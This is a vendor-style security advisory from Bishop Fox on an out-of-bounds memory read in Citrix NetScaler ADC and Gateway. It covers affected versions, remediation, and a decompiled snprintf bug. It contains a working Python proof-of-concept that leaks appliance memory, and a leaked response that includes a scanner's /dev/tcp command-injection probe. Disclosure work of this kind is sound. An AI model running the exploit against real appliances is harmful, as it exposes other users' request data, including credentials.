OOB Memory Read: Netscaler ADC and Gateway

Gauge showing high severity reading

Share

Product Vendor

Cloud Software Group

Product Description

The affected Citrix NetScaler ADC and Gateway components are used for Authentication, Authorization, and Auditing (AAA), and remote access.

Vulnerabilities List

One vulnerability was identified within Citrix Netscaler ADC and Gateway:

  • Out-Of-Bounds Memory Read

Affected Version

  • NetScaler ADC and NetScaler Gateway 14.1 before 14.1-12.35
  • NetScaler ADC and NetScaler Gateway 13.1 before 13.1-51.15
  • NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.21
  • NetScaler ADC 13.1-FIPS before 13.1-37.176
  • NetScaler ADC 12.1-FIPS before 12.1-55.302
  • NetScaler ADC 12.1-NDcPP before 12.1-55.302

NetScaler ADC and NetScaler Gateway version 12.1 is now End Of Life (EOL) and is vulnerable.

Summary of Findings

The vulnerability would enable an unauthenticated attacker to remotely obtain information from a NetScaler appliance configured as a Gateway or AAA virtual server. While similar in nature to CVE-2023-4966, this issue is much less likely to return highly sensitive information to an attacker.

Impact

The vulnerability allows an attacker to recover data from memory. Although in most cases nothing of value is returned, in our own testing of Bishop Fox Cosmos customers we have observed instances where POST request bodies from previous HTTP requests are leaked. Web applications use POST requests to transmit potentially sensitive information (e.g., state or credentials), so that request data should normally be kept private.

Solution

Follow the remediation guidance specified in Citrix security bulletin CTX584986 by installing the following updated software as soon as possible:

  • NetScaler ADC and NetScaler Gateway 14.1-12.35 and later releases
  • NetScaler ADC and NetScaler Gateway  13.1-51.15 and later releases of 13.1
  • NetScaler ADC and NetScaler Gateway 13.0-92.21 and later releases of 13.0 
  • NetScaler ADC 13.1-FIPS 13.1-37.176 and later releases of 13.1-FIPS 
  • NetScaler ADC 12.1-FIPS 12.1-55.302 and later releases of 12.1-FIPS 
  • NetScaler ADC 12.1-NDcPP 12.1-55.302 and later releases of 12.1-NDcPP

Out-Of-Bounds Memory Read

NetScaler ADC and Gateway products were vulnerable to an unauthenticated out-of-bounds memory read which could be exploited to capture information from the appliance’s process memory, including HTTP request bodies.

Vulnerability Details

CVE ID: The vendor has updated CVE-2023-6549 to account for this vulnerability, along with the original denial of service vulnerability, as they are remediated by the same fix.

Vulnerability Type: Out-Of-Bounds Read

Access Vector: ☒ Remote, ☐ Local, ☐ Physical, ☐ Context dependent, ☐ Other (if other, please specify)

Impact: ☐ Code execution, ☐ Denial of service, ☐ Escalation of privileges, ☒ Information disclosure, ☐ Other (if other, please specify)

Security Risk: ☐ Critical, ☒ High, ☐ Medium, ☐ Low

Vulnerability: CWE-125 (Out-Of-Bounds Read)

Bishop Fox staff determined that prior releases of NetScaler ADC and Gateway products were vulnerable to an unauthenticated out-of-bounds memory read and exploited the vulnerability to capture information from the appliance’s process memory, including HTTP request bodies.

Bishop Fox staff determined that the Gateway or AAA virtual server performs unsafe handling of the HTTP Host request header when handling HTTP GET requests for the /nf/auth/startwebview.do URI. The vulnerable function attempts to calculate the length of a string containing the Host header and then direct a subsequent function to copy a string of that length to an HTTP response message. However, incorrect use of the C snprintf method results in the length exceeding the size of the source buffer and causing unrelated data to be copied to the response if the Host header value submitted in the request is longer than approximately 5,394 bytes. Authentication is not required to exploit this vulnerability.

The following Python proof-of-concept code can be used to demonstrate exploitability when executed against a vulnerable appliance:

import requests 
url = "https://<HOST>/nf/auth/startwebview.do"  
r = requests.get(url, headers={"Host":"A"*0x5000}, verify=False)  

print(r.content[0x1800:])

Figure 1 – Proof-of-concept exploit code

Requests to the /nf/auth/startwebview.do URI are handled by the ns_aaa_start_webview_for_authv3 function. The ns_aaa_start_webview_for_authv3 function constructs an XML response using the snprintf function and returns this response to the user by calling the ns_vpn_send_response function, as shown below:

sprintf(print_temp_rule,"%s%.*s%s",proto,iVar5 - (int)host_hdr,host_hdr, 
  "/nf/auth/doWebview.do"); 
length = snprintf(&ns_HttpRedirectPkt,0x1800, 
  "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><AuthenticateRespo nse xmlns=\"http://citrix.com/authentication/response/1\"><Status>success</Statu s><Result>more-info</Result><StateContext></StateContext><AuthenticationRequirem ents><PostBack>/nf/auth/webview/done</PostBack><CancelPostBack>/nf/auth/doLogoff .do</CancelPostBack><CancelButtonText>Cancel</CancelButtonText><Requirements><Re quirement><Credential><ID>samlResponse</ID><Type>webview</Type><wv:WebView xmlns :wv=\"http://citrix.com/authentication/response/webview/1\"><wv:StartUrl>%.*s</w v:StartUrl></wv:WebView></Credential><Label><Type>none</Type></Label><Input/></R equirement></Requirements></AuthenticationRequirements></AuthenticateResponse>" 
  ,length,print_temp_rule); 
ns_vpn_send_response(lVar1,0x980200,&ns_HttpRedirectPkt,length);

Figure 2 – Excerpt of decompiled ns_aaa_start_webview_for_authv3 function

The ns_vpn_send_response function sends an HTTP response where the body and size of the body are provided as parameters. In the code shown above, the size is set to the return value from the snprintf function. According to the documentation for the snprintf function, the return value is the number of characters that would have been written if enough space had been available. Therefore, if the constructed response would have exceeded the buffer size (0x1800 bytes in this case), the ns_vpn_send_response function will respond with extra data past the end of the buffer. This is identical to the underlying cause of CVE-2023-4966 (CitrixBleed).

The unsafe use of the sprintf function in the ns_aaa_start_webview_for_authv3 function is discussed in more detail in the Insecure String Handling finding of this report.

Bishop Fox staff analyzed prior releases of vulnerable Citrix deployments and observed instances where the disclosed memory contained data from HTTP requests, sometimes including POST request bodies. For example, the response below includes data from another HTTP request processed by the appliance, apparently related to a Nessus vulnerability scan:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?> 
  <AuthenticateResponse xmlns="http://citrix.com/authentication/response/1"> 
    <Status>success</Status> 
    <Result>more-info</Result> 
    <StateContext></StateContext> 
    <AuthenticationRequirements> 
      <PostBack>/nf/auth/webview/done</PostBack> 
      <CancelPostBack>/nf/auth/doLogoff.do</CancelPostBack> 
      <CancelButtonText>Cancel</CancelButtonText> 
      <Requirements> 
        <Requirement> 
          <Credential> 
          <ID>samlResponse</ID> 
          <Type>webview</Type> 
          <wv:WebView xmlns:wv="http://citrix.com/authentication/response/webview/1"> 
          <wv:StartUrl>https://[...omitted for brevity...] 
            /Citrix/[REDACTED]/cgi-bin/ncbook/book.cgi ck.cgi 0-c%20%22echo%20exploited_port[80]by_nessus%20%26gt;/dev/tcp/[REDACTED]/41418") 20%23 xt=1 %22stdClass%22%3a3%3a%7bs%3a3%3a%22mod%22%3bs%3a15%3a%22resourcesmodule%22%3bs%3a3%3a%22src%22%3bs%3a20%3a%22%40random41940ceb78dbb%22%3bs%3a3%3a%22int%22%3bs%3a0%3a%22%22%3b%7d[...omitted for brevity...]

Figure 3 – NetScaler appliance response disclosing memory content

Affected Locations

URI

/nf/auth/startwebview.do

Function

ns_aaa_start_webview_for_authv3 in /netscaler/nsppe

Credits

  • Capability Development Group at Bishop Fox

Timeline

  • 01/22/2024: Initial discovery
  • 01/25/2024: Contact with vendor
  • 02/01/2024: Vendor acknowledged vulnerabilities
  • 05/06/2024: Vulnerabilities publicly disclosed
  • 05/10/2024: Vendor updates security bulletin to confirm that that the fix for denial of service in CVE-2023-6549 also addresses the out-of-bounds memory read

Subscribe to Bishop Fox's Security Blog

Be first to learn about latest tools, advisories, and findings.


Bishop Fox Security Consultants

About the author, Bishop Fox

Security Experts

Due to the nature in which we conduct research and penetration tests, some of our security experts prefer to remain anonymous. Their work is published under our Bishop Fox name.

Bishop Fox is the leading authority in offensive security, providing solutions ranging from continuous penetration testing, red teaming, and attack surface management to product, cloud, and application security assessments. We’ve worked with more than 25% of the Fortune 100, half of the Fortune 10, eight of the top 10 global technology companies, and all of the top global media companies to improve their security. Our Cosmos platform, service innovation, and culture of excellence continue to gather accolades from industry award programs including Fast Company, Inc., SC Media, and others, and our offerings are consistently ranked as “world class” in customer experience surveys. We’ve been actively contributing to and supporting the security community for almost two decades and have published more than 16 open-source tools and 50 security advisories in the last five years. Learn more at bishopfox.com or follow us on Twitter.

More by Bishop

This site uses cookies to provide you with a great user experience. By continuing to use our website, you consent to the use of cookies. To find out more about the cookies we use, please see our Privacy Policy.